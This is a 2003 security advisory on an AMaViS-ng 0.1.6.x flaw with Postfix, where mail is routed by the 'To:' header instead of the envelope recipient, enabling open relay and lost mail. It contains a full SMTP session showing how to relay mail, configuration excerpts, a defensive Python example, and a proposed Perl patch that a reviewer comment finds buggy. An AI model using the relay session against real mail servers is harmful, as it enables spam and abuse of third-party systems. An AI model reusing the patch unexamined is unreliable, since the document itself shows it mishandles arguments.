AMaViS-ng possible open relay and mail loss
9th Apr 2003 [SBWID-6124]
COMMAND
	AMaViS-ng possible open relay and mail loss
SYSTEMS AFFECTED
	AMaViS-ng 0.1.6.x
PROBLEM
	Phil Cyc found the following, shown here with Postfix but not specific to it:
	
	With Postfix using AMaViS-ng 0.1.6.x (tested: 0.1.6.2 and 0.1.6.3;
	0.1.4.x is not vulnerable), all email gets forwarded to the address
	specified by the "To:" header line, ignoring the real recipient given
	via "RCPT TO:".
	
	Possible exploit:
	
	
	--%snip%--
	#> telnet somemx.domain.tld 25
	(220 somemx.domain.tld ESMTP Postfix)
	helo amavis-ng
	(250 somemx.domain.tld)
	mail from:userX@domainX.tld
	(250 ok)
	rcpt to:userY@domain.tld
	(250 ok)
	data
	(354 End data with <CR><LF>.<CR><LF>)
	From: userX@domainX.tld
	To: userZ@domainZ.tld
	Subject: AMaViS-ng 0.1.6.x bug
	.
	(250 Ok: queued as ...)
	quit
	(221 Bye)
	--%snip%--
	
	
	
	 Requirements
	 ============
	
	The mx (somemx.domain.tld) having postfix and AMaViS-ng 0.1.6.x
	installed must accept emails for userY@domain.tld.
	
	 What does it do
	 ===============
	
	userX@domainX.tld is sending an email to userY@domain.tld. The header
	of this email contains "To: userZ@domain.tld". AMaViS-ng seems to parse
	the header and forwards the email to userZ@domain.tld. userY@domain.tld
	does not get this email. As many postfix users trust their localhost
	(no restrictions for localhost), it is possible to relay an email or a
	spam mail this way.
	
	 configuration files (relevant parts):
	 =====================================
	
	
	# $postfix/master.cf
	smtp inet n - n - - smtpd -o content_filter=filter:
	filter unix - n n - - pipe
	 flags=Rq user=mail argv=/usr/bin/amavis ${sender} -- ${recipient}
	# end of master.cf
	
	# $amavis-ng/amavis.conf
	[global]
	mail-transfer-agent = Postfix
	
	[Postfix]
	postfix = /usr/sbin/sendmail
	args = -i -f
	# end of amavis.conf
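
The routing rule at stake, as an added Python example that is not part of the advisory or of AMaViS-ng's code: re-injection recipients come only from the argv Postfix passes to the filter (`${sender} -- ${recipient}` in the master.cf above), and header addresses outside that set are flagged. Function names are hypothetical, and the `--` before the recipients on the sendmail command line is an assumption.

```python
# Added example: envelope handling for a Postfix pipe(8) content filter.
from email import message_from_string
from email.utils import getaddresses

SENDMAIL = ["/usr/sbin/sendmail", "-i"]  # path and -i as in the page's amavis.conf

def parse_filter_argv(argv):
    """Return (sender, recipients) from '[-f] sender [--|-d] rcpt...'."""
    args = list(argv)
    if args and args[0] == "-f":
        args.pop(0)
    if not args:
        raise ValueError("no envelope sender passed by the MTA")
    sender = args.pop(0) or "<>"         # empty sender is the null return path
    if args and args[0] in ("--", "-d"):
        args.pop(0)
    if not args:
        raise ValueError("no envelope recipient passed by the MTA")
    for rcpt in args:
        if rcpt.startswith("-"):         # would be read as an option on re-injection
            raise ValueError("suspicious recipient: %r" % rcpt)
    return sender, args

def reinjection_argv(argv):
    """Command line for handing the scanned mail back; headers play no part."""
    sender, rcpts = parse_filter_argv(argv)
    # Assumption: "--" ends option parsing for the sendmail binary in use.
    return SENDMAIL + ["-f", sender, "--"] + rcpts

def header_only_recipients(raw_message, envelope_rcpts):
    """Header addresses that are not envelope recipients. A filter that
    delivers to any of these is routing on headers, as described above."""
    msg = message_from_string(raw_message)
    fields = msg.get_all("To", []) + msg.get_all("Cc", [])
    envelope = {r.lower() for r in envelope_rcpts}
    return sorted({a.lower() for _, a in getaddresses(fields) if a} - envelope)

# Constructed sample, mirroring the SMTP session shown earlier on the page.
SAMPLE_ARGV = ["userX@domainX.tld", "--", "userY@domain.tld"]
SAMPLE_MESSAGE = (
    "From: userX@domainX.tld\n"
    "To: userZ@domainZ.tld\n"
    "Subject: AMaViS-ng 0.1.6.x bug\n"
    "\n"
)

if __name__ == "__main__":
    print(reinjection_argv(SAMPLE_ARGV))
    print(header_only_recipients(SAMPLE_MESSAGE, SAMPLE_ARGV[2:]))
```
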
	
	
SOLUTION
	
	 Update 10 Apr.
	 ===============
	
	Phil Cyc proposed the following patch, as the software maintainer did
	not release any patch.
	
	
	diff -Nru amavis-ng-0.1.6.3.orig/AMAVIS/MTA/Postfix.pm amavis-ng-0.1.6.3.postfix/AMAVIS/MTA/Postfix.pm
	--- amavis-ng-0.1.6.3.orig/AMAVIS/MTA/Postfix.pm	Tue Mar 18 00:04:21 2003
	+++ amavis-ng-0.1.6.3.postfix/AMAVIS/MTA/Postfix.pm	Tue Apr 8 23:28:09 2003
	@@ -112,22 +112,11 @@
	 
	 writelog($args,LOG_DEBUG, "Called as amavis ".join(' ',@ARGV));
	 
	- while (shift @ARGV) {
	- /^-f$/ && next; # ignore "-f"
	- /^-d$/ && next; # ignore "-d"
	- s/^(.*)$/1ドル/; # untaint sender or recipient
	- if (not defined $$args{'sender'}) {
	- if (/^$/) {
	-	$$args{'sender'} = "<>";
	- }
	- else {
	-	$$args{'sender'} = $_;
	- }
	- }
	- else {
	- push @{$$args{'recipients'}}, $_;
	- }
	- }
	+ shift @ARGV if $ARGV[0] eq "-f";
	+ $$args{'sender'} = shift @ARGV;
	+ $$args{'sender'} = "<>" if (!$$args{'sender'});
	+ shift @ARGV if $ARGV[0] eq "-d";
	+ push @{$$args{'recipients'}}, @ARGV;
	 
	 # Message file has been written, reset file pointer and put it into
	 # the record.
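
	Review bot: the added lines skip only a literal "-d" before the recipients, but the master.cf shown on this page invokes the filter as "${sender} -- ${recipient}", so the "--" separator is pushed into @{$$args{'recipients'}} as if it were an address; skip "--" as well as "-d" before the final push. The removed loop untainted each argument and the added lines do not, so sender and recipients stay tainted if the script runs in taint mode; keep an untaint step, with a pattern stricter than ".*". Both 'shift @ARGV if $ARGV[0] eq "-f"' and the "-d" test compare against $ARGV[0] without checking that @ARGV is non-empty, and "!$$args{'sender'}" also turns a sender of "0" into "<>"; test with defined and length instead.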
	
	
